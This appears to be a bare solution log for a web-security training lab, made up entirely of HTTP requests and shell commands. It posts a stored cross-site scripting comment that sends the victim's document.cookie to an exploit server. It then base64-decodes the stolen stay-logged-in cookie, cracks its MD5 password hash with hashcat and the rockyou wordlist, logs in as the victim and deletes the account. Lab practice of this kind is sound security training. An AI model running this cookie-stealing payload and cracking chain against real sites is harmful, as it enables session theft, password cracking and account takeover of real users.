POST /login HTTP/1.1

username=wiener&password=peter&stay-logged-in=on

POST /post/comment HTTP/1.1

postId=2&comment=%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&name=aaaaa&email=aaaaa%40aaaaa&website=http%3A%2F%2Faaaaa

POST /post/comment HTTP/1.1

postId=2&comment=%3Cscript%3Edocument.location%3D%27%2F%2Fexploit-ac8d1fd91fbd37e9c0d9587c01e2001b.web-security-academy.net%2Fexploit%27%2Bdocument.cookie%3C%2Fscript%3E&name=aaaaa&email=aaaaa%40aaaaa&website=http%3A%2F%2Faaaaa

$ echo -n 'd2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw' | base64 -d

$ echo -n 'peter' | md5sum

$ echo -n 'Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz' | base64 -d

$ echo '26323c16d5f4dabff3bb136f2460a943' > ~/Downloads/hashfiles

$ hashid ~/Downloads/hashfiles

$ hashcat -m 0 -a 0 ~/Downloads/hashfiles /usr/share/wordlists/rockyou.txt

$ hashcat -m 0 -a 0 ~/Downloads/hashfiles /usr/share/wordlists/rockyou.txt --show

POST /login HTTP/1.1

username=carlos&password=onceuponatime

POST /my-account/delete HTTP/1.1

password=onceuponatime
